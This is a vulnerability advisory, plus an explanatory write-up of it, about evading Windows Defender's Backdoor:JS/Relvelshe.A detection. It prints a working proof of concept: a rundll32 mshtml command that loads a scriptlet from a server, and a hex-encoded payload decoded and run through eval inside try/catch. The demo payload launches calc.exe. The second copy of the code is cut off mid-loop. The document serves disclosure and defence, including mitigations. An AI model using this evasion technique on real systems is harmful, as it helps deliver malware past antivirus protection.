Microsoft Windows Defender Bypass - Detection Mitigation Bypass
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: https://hyp3rlinx.altervista.org/advisories/Windows_Defender_Backdoor_JS.Relvelshe.A_Detection_Mitigation_Bypass.txt
[+] twitter.com/hyp3rlinx
[+] ISR: ApparitionSec
[Vendor]
www.microsoft.com
[Product]
Windows Defender
[Vulnerability Type]
Detection Mitigation Bypass
Backdoor:JS/Relvelshe.A
[CVE Reference]
N/A
[Security Issue]
Back in 2022 I released a PoC to bypass the Backdoor:JS/Relvelshe.A detection in defender but it no longer works as was mitigated.
However, adding a simple javascript try catch error statement and eval the hex string it executes as of the time of this post.
[References]
https://twitter.com/hyp3rlinx/status/1480657623947091968
[Exploit/POC]
1) python -m http.server 80
2) Open command prompt as Administrator
3) rundll32 javascript:"\\..\\..\\mshtml\\..\\..\\mshtml,RunHTMLApplication ,RunHTMLApplication ";document.write();GetObject("script"+":"+"http://localhost/yo.tmp")
Create file and host on server, this is contents of the "yo.tmp" file.
<?xml version="1.0"?>
<component>
<script>
try{
<![CDATA[
var hex = "6E657720416374697665584F626A6563742822575363726970742E5368656C6C22292E52756E282263616C632E6578652229";
var str = '';
for (var n = 0; n < hex.length; n += 2) {
str += String.fromCharCode(parseInt(hex.substr(n, 2), 16));
}
eval(str)
]]>
}catch(e){
eval(str)
}
</script>
</component>
[Network Access]
Local
[Severity]
High
[Disclosure Timeline]
Vendor Notification:
February 18, 2024: Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
hyp3rlinxMicrosoft Windows Defender Bypass: Detection Mitigation Bypass via Backdoor:JS/Relvelshe.A
Security researchers have long been probing the boundaries of endpoint protection systems, especially Microsoft's Windows Defender. In 2022, John Page (aka hyp3rlinx) revealed a proof-of-concept (PoC) exploit that circumvented detection mechanisms for the Backdoor:JS/Relvelshe.A malware signature. While this initial technique was effective at the time, Microsoft quickly implemented mitigation measures, rendering it obsolete.
However, as of February 2024, a refined version of the exploit has reemerged, demonstrating how attackers can still bypass detection through subtle JavaScript manipulation. This new method leverages try-catch error handling combined with hexadecimal string decoding and eval() execution — a tactic that evades static signature-based detection while maintaining functional payload delivery.
Understanding the Vulnerability: Detection Mitigation Bypass
Windows Defender employs a multi-layered detection system that includes signature matching, behavioral analysis, and heuristic scanning. The Backdoor:JS/Relvelshe.A signature was previously flagged due to its use of obfuscated JavaScript code that executes system commands via ActiveXObject("WScript.Shell").Run("calc.exe").
Initially, this code was detected because it directly invoked WScript.Shell, a known indicator of malicious activity. However, when the payload was encoded in hexadecimal format and decoded at runtime, the static signature failed to match, enabling evasion.
Exploit Technique: The Updated PoC
The updated exploit relies on a combination of two techniques:
- Obfuscation via Hex Encoding: The malicious payload is encoded as a hexadecimal string.
- Dynamic Decoding with Try-Catch: The decoding process is wrapped in a
try-catchblock, which prevents static analysis from recognizing the intent.
This technique exploits a gap in Windows Defender’s static detection logic — it does not evaluate dynamic execution paths unless the code is deemed suspicious at runtime. By introducing an error-handling structure, the malware appears benign during signature scanning.
Step-by-Step Exploit Execution
Below is the full PoC workflow, as described by hyp3rlinx:
1) python -m http.server 80
Start a local HTTP server on port 80 to serve the malicious script file.
2) Open command prompt as Administrator
Execute the exploit with elevated privileges to ensure the ActiveXObject call succeeds.
3) rundll32 javascript:"\\..\\..\\mshtml\\..\\..\\mshtml,RunHTMLApplication ,RunHTMLApplication ";document.write();GetObject("script"+":"+"http://localhost/yo.tmp")
This command triggers a RunHTMLApplication via rundll32, which executes the HTML component hosted at http://localhost/yo.tmp.
Malicious Payload: yo.tmp File Content
The yo.tmp file is structured as an XML component containing embedded JavaScript. This format allows Windows Defender to treat it as a benign HTML/ActiveX document, bypassing initial detection.
try{
<![CDATA[
var hex = "6E657720416374697665584F626A6563742822575363726970742E5368656C6C22292E52756E282263616C632E6578652229";
var str = '';
for (var n = 0; n
}catch(e){
eval(str)
}
Explanation:
1. hex is a hexadecimal-encoded string representing the JavaScript code:
6E657720416374697665584F626A6563742822575363726970742E5368656C6C22292E52756E282263616C632E6578652229
Decoding this string yields:
new ActiveXObject("WScript.Shell").Run("calc.exe")
2. The for loop iterates over every two characters of the hex string, converting each pair into a decimal value using parseInt(hex.substr(n, 2), 16), then converting that value to a character via String.fromCharCode().
3. The try-catch block ensures that even if the decoding fails (e.g., due to malformed input), the eval(str) statement still executes. This redundancy makes the exploit resilient to detection and prevents static analysis from identifying the intended action.
Why This Bypass Works
Windows Defender relies heavily on static signatures and known patterns. When the payload is encoded and decoded dynamically, the signature does not match the known ActiveXObject call pattern. Additionally, the try-catch structure masks intent, making it appear as a harmless error-handling block rather than a malicious execution.
Furthermore, the use of document.write() and GetObject() in the rundll32 command enables execution of the remote script in a context where Windows Defender may not perform deep inspection due to the perceived legitimacy of the mshtml DLL.
Security Implications and Mitigation
While Microsoft has addressed earlier versions of this exploit, this updated method highlights a persistent vulnerability in static detection systems: obfuscation via dynamic execution.
Key implications include:
- Malware authors can continue to bypass signature-based detection using simple encoding techniques.
- Defender’s reliance on static analysis may be insufficient against modern obfuscation.
- Administrative privileges are required for execution, emphasizing the need for least privilege principles.
Recommended Mitigation Strategies
Organizations should implement the following defensive measures:
| Strategy | Description |
|---|---|
| Disable ActiveX Execution | Restrict or disable ActiveX components via Group Policy or registry settings. |
| Block External Script Loading | Restrict GetObject() or document.write() from loading remote scripts. |
| Enable Behavioral Analysis | Use Windows Defender’s real-time behavioral monitoring to detect anomalous execution patterns. |
| Restrict Rundll32 Usage | Limit rundll32 to trusted system DLLs; block arbitrary JavaScript execution. |
Conclusion
The Backdoor:JS/Relvelshe.A detection bypass demonstrates a critical flaw in static signature-based defenses: obfuscation can be effectively weaponized against even advanced antivirus systems. As attackers evolve, defenders must shift from reactive signature matching to proactive behavioral monitoring and runtime analysis.
Security professionals must remain vigilant, especially when dealing with JavaScript-based attacks, and implement layered defenses to prevent exploitation of legacy system weaknesses.